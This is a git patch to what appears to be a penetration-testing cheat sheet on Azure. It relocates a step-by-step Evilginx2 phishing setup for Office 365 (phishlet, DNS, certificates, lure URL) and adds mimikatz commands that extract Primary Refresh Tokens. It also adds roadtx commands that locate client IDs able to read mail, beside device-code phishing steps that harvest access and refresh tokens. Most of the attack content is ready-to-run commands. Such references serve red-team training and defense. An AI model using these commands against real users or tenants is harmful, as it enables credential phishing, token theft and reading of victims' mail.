From 4947154dc773ac606376c34d065f03bfc13b7fd0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 21 Nov 2023 23:34:26 +0100 Subject: [PATCH] Evilginx Phishlet --- docs/cloud/azure/Cloud - Azure Pentest.md | 23 ----------------- docs/cloud/azure/azure-access-and-token.md | 6 +++-- .../azure/azure-devices-users-services.md | 13 +++++++++- docs/cloud/azure/azure-phishing.md | 25 ++++++++++++++++++- docs/cloud/azure/azure-services.md | 4 +-- 5 files changed, 42 insertions(+), 29 deletions(-) diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md index c19a18e..173ffd7 100644 --- a/docs/cloud/azure/Cloud - Azure Pentest.md +++ b/docs/cloud/azure/Cloud - Azure Pentest.md @@ -16,7 +16,6 @@ * [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli) * [Enumerate manually](#enumerate-manually) * [Enumeration methodology](#enumeration-methodology) -* [Phishing with Evilginx2](#phishing-with-evilginx2) * [Token from Managed Identity](#token-from-managed-identity) * [Azure API via Powershell](#azure-api-via-powershell) * [Azure API via Python Version](#azure-api-via-python-version) @@ -439,28 +438,6 @@ PS Az> Get-AzStorageAccount | fl PS Az> Get-AzKeyVault ``` -## Phishing with Evilginx2 - -```powershell -PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets -: config domain username.corp -: config ip 10.10.10.10 -: phishlets hostname o365 login.username.corp -: phishlets get-hosts o365 - -Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine - -# copy certificate and enable the phishing -PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt -PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key -: phishlets enable o365 - -# get the phishing URL -: lures create o365 -: lures get-url 0 -``` - - ## Token from Managed Identity diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 59396a0..41e943e 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -91,13 +91,15 @@ Mail.ReadWrite.All https://graph.microsoft.com 00b41c95-dab0-4487-9 * Use PRT token ```ps1 - roadtx browserprtauth -prt roadtx.prt -url http://www.office.com + roadtx browserprtauth --prt --prt-sessionkey + roadtx browserprtauth --prt roadtx.prt -url http://www.office.com ``` ### Extract PRT v1 ```ps1 +mimikatz # token::elevate mimikatz # sekurlsa::cloudap mimikatz # sekurlsa::dpapi mimikatz # dpapi::cloudapkd /keyvalue: /unprotect @@ -110,7 +112,7 @@ roadtx browserprtauth --prt --prt-sessionkey --keep-open -url * No method known to date. -### Generate a PRT by registering a device +### Upgrade Refresh Token to PRT ```ps1 # Get correct token audience diff --git a/docs/cloud/azure/azure-devices-users-services.md b/docs/cloud/azure/azure-devices-users-services.md index cd8e733..ad03a57 100644 --- a/docs/cloud/azure/azure-devices-users-services.md +++ b/docs/cloud/azure/azure-devices-users-services.md @@ -45,4 +45,15 @@ roadtx browserprtauth --prt --prt-sessionkey --kee ``` -# Service Principals \ No newline at end of file +# Service Principals + + + +# Other + +Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph: + +```ps1 +roadtx getscope -s https://graph.microsoft.com/mail.read +roadtx findscope -s https://graph.microsoft.com/mail.read +``` diff --git a/docs/cloud/azure/azure-phishing.md b/docs/cloud/azure/azure-phishing.md index 243e227..eef46d7 100644 --- a/docs/cloud/azure/azure-phishing.md +++ b/docs/cloud/azure/azure-phishing.md @@ -97,4 +97,27 @@ roadtx codeauth -c -r msgraph -t <0.A....> -ru 'https://` in the [phishing email](https://github.com/rvrsh3ll/TokenTactics/blob/main/resources/DeviceCodePhishingEmailTemplate.oft) * Leave TokenTactics running in the PowerShell window and send the phishing email * Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form -* Enjoy your **access token** and **refresh token** \ No newline at end of file +* Enjoy your **access token** and **refresh token** + + +## Phishing with Evilginx2 + +* Run `evilginx2` with o365 phishlet + ```powershell + PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets + : config domain username.corp + : config ip 10.10.10.10 + : phishlets hostname o365 login.username.corp + : phishlets get-hosts o365 + ``` +* Create a DNS entry type A for `login.login.username.corp` and `www.login.username.corp`, pointing to your machine +* Copy certificate and enable the phishing + ```ps1 + PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt + PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key + : phishlets enable o365 + + # get the phishing URL + : lures create o365 + : lures get-url 0 + ``` diff --git a/docs/cloud/azure/azure-services.md b/docs/cloud/azure/azure-services.md index 5e43ebd..6c23630 100644 --- a/docs/cloud/azure/azure-services.md +++ b/docs/cloud/azure/azure-services.md @@ -50,7 +50,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | ``` -## Outlook Mails +### Outlook Mails * Read user mails ```ps1 @@ -58,7 +58,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | Get-MgUserMessageContent -OutFile mail.txt -UserId -MessageId ``` -## OneDrive Files +### OneDrive Files ```ps1 $userId = ""